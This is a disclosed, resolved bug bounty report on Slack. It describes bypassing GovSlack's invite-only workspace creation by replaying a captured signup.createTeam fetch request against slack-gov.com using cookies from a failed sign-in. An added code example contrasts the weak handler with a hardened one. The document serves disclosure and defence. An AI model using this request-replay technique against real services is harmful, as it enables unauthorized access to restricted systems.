
Unauthorized access to GovSlack

Medium
Slack

Team Summary

Official summary from Slack

Users were able to create a new Workspace within the GovSlack product. This was possible by saving the HTTP POST request to the target /api/signup.createTeam API endpoint when creating a Slack Workspace on slack.com, then using the cookies from a failed GovSlack sign-in attempt to call the endpoint, resulting in a GovSlack instance being created for the user. This behavior bypassed security controls which normally require a user to be invited to an existing GovSlack instance or contact Slack to create a new GovSlack instance, and allows the user to access features only available with GovSlack. Slack’s internal team resolved this issue on December 13, 2022, blocking GovSlack in /api/signup.createTeam from future use and confirmed that no data from existing workspaces was exposed as a result of this issue.

Reported by violet

Vulnerability Details

Technical details and impact analysis

Improper Authentication - Generic
Head to slack.com (I use Firefox), log in as a user that hasn't used Slack, create a workspace, copy the payload as fetch. In my case:

```javascript
// Request captured from the browser's "Copy as fetch" while creating a
// workspace on slack.com. The session cookies are sent via credentials: "include".
await fetch("https://slack.com/api/signup.createTeam?_x_id=noversion-1667355054.372", {
  "credentials": "include",
  "headers": {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Content-Type": "multipart/form-data; boundary=---------------------------34111059701841183173198228768",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin"
  },
  "referrer": "https://slack.com/get-started",
  // multipart/form-data body: email_misc, tz, locale, last_tos_acknowledged, login, in_setup_experiment
  "body": "-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"email_misc\"\r\n\r\ntrue\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"tz\"\r\n\r\nAmerica/Los_Angeles\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"locale\"\r\n\r\nen-US\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"last_tos_acknowledged\"\r\n\r\ntos_mar2018\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"login\"\r\n\r\ntrue\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"in_setup_experiment\"\r\n\r\ntrue\r\n-----------------------------34111059701841183173198228768--\r\n",
  "method": "POST",
  "mode": "cors"
});
```

Log in to slack-gov.com, where the option to create a workspace for new users is disabled. Send this same fetch request, replacing slack.com with slack-gov.com. In my case, the workspace created is viomck.slack-gov.com.

## Impact

Unauthorized access to GovSlack.
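The control gap the report describes, modelled as an added example that is not Slack's code and not part of the original report: a signup.createTeam endpoint reachable on two hostnames, where the gov host only hides the "create workspace" UI while the API accepts any cookie that resolves to a session. Beside the weak handler is a hardened one that derives the product from the Host the request actually arrived on, refuses self-serve creation where the product does not allow it, and accepts only a completed sign-in on that same product. Host names, product names, the session records, the `d` cookie name and the return shapes are assumptions; the form fields and boundary are the ones from the captured request above.

```javascript
// Added example, not Slack's code. Models a signup.createTeam endpoint that
// is reachable on two hostnames and shows (a) the gap the report exploits:
// the gov host hides the "create workspace" UI but the API accepts any
// cookie that resolves to a session, and (b) an explicit server-side check.
// Host names, product names, session records and return shapes are assumed.

const PRODUCT_BY_HOST = { "slack.com": "commercial", "slack-gov.com": "gov" };

// Products that allow self-serve workspace creation through the API.
const SELF_SERVE_CREATE_TEAM = { commercial: true, gov: false };

// Constructed sessions keyed by cookie value. "g-partial" stands in for the
// cookie a sign-in attempt on the gov host leaves behind before it completes.
const SESSIONS = {
  "c-full":    { user: "alice", product: "commercial", state: "authenticated" },
  "g-partial": { user: "alice", product: "gov",        state: "signin_incomplete" },
};

// Form fields and boundary taken from the request in the report.
const BOUNDARY = "---------------------------34111059701841183173198228768";
const SIGNUP_FIELDS = {
  email_misc: "true",
  tz: "America/Los_Angeles",
  locale: "en-US",
  last_tos_acknowledged: "tos_mar2018",
  login: "true",
  in_setup_experiment: "true",
};

// Encodes text fields as multipart/form-data, the way the browser did.
function buildMultipart(fields, boundary) {
  let out = "";
  for (const [name, value] of Object.entries(fields)) {
    out += `--${boundary}\r\nContent-Disposition: form-data; name="${name}"\r\n\r\n${value}\r\n`;
  }
  return out + `--${boundary}--\r\n`;
}

// Decodes text-only multipart/form-data back into an object.
function parseMultipart(body, boundary) {
  const fields = {};
  for (const part of body.split(`--${boundary}`)) {
    const m = /name="([^"]+)"\r\n\r\n([\s\S]*?)\r\n$/.exec(part);
    if (m) fields[m[1]] = m[2];
  }
  return fields;
}

// Builds the replayed request: same body, only the Host and cookie differ.
function makeRequest(host, cookie) {
  return {
    method: "POST",
    path: "/api/signup.createTeam",
    headers: { Host: host, "Content-Type": `multipart/form-data; boundary=${BOUNDARY}` },
    cookies: { d: cookie },
    body: buildMultipart(SIGNUP_FIELDS, BOUNDARY),
  };
}

function fieldsOf(req) {
  const boundary = /boundary=(.+)$/.exec(req.headers["Content-Type"])[1];
  return parseMultipart(req.body, boundary);
}

// Weak handler: any resolvable session may create a team on whichever host
// the request arrived at. Disabling the UI on the gov host does not help.
function createTeamWeak(req) {
  const session = SESSIONS[req.cookies.d];
  if (!session) return { ok: false, error: "not_authed" };
  const f = fieldsOf(req);
  return { ok: true, team: { owner: session.user, host: req.headers.Host, locale: f.locale } };
}

// Hardened handler: product comes from the Host the request actually hit,
// self-serve creation is refused where the product does not allow it, and
// only a completed sign-in on that same product is accepted.
function createTeamHardened(req) {
  const product = PRODUCT_BY_HOST[req.headers.Host];
  if (!product) return { ok: false, error: "unknown_host" };
  if (!SELF_SERVE_CREATE_TEAM[product]) return { ok: false, error: "self_serve_disabled" };
  const session = SESSIONS[req.cookies.d];
  if (!session || session.state !== "authenticated" || session.product !== product) {
    return { ok: false, error: "not_authed" };
  }
  const f = fieldsOf(req);
  return { ok: true, team: { owner: session.user, host: req.headers.Host, locale: f.locale } };
}

// Replays the saved commercial request against the gov host with the
// partial gov cookie, as the report does, through both handlers.
function replayAgainstGov() {
  const req = makeRequest("slack-gov.com", "g-partial");
  return { weak: createTeamWeak(req), hardened: createTeamHardened(req) };
}
```

Calling `replayAgainstGov()` returns a created team from the weak handler and `self_serve_disabled` from the hardened one. The point of the hardened version is that the product decision is made from the request's own Host, not from whether a UI button was rendered, and that a half-finished sign-in is not treated as an authenticated session.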

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$1500.00

Weakness

Improper Authentication - Generic